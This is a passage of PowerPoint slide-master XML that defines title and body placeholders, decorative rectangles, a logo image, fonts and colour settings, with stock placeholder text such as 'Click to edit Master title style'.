              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 9" hidden="1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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23" name="Rectangle 10" hidden="1"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058240" y="599760"/>
            <a:ext cx="3687120" cy="581652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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204040" y="863640"/>
            <a:ext cx="3123720" cy="4807080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775080" y="863640"/>
            <a:ext cx="7161120" cy="4807080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="94680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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29" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="982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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 9"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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33" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{2114AC3E-2F93-48C4-A48B-EA5E259F60F0}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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36" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1302120"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="9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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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45" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="5141880"/>
            <a:ext cx="11290680" cy="125856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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2394000"/>
            <a:ext cx="11029320" cy="2147040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="4541400"/>
            <a:ext cx="11029320" cy="600120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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52" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{80E5854F-32C3-4663-B9F5-F51154B2F269}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
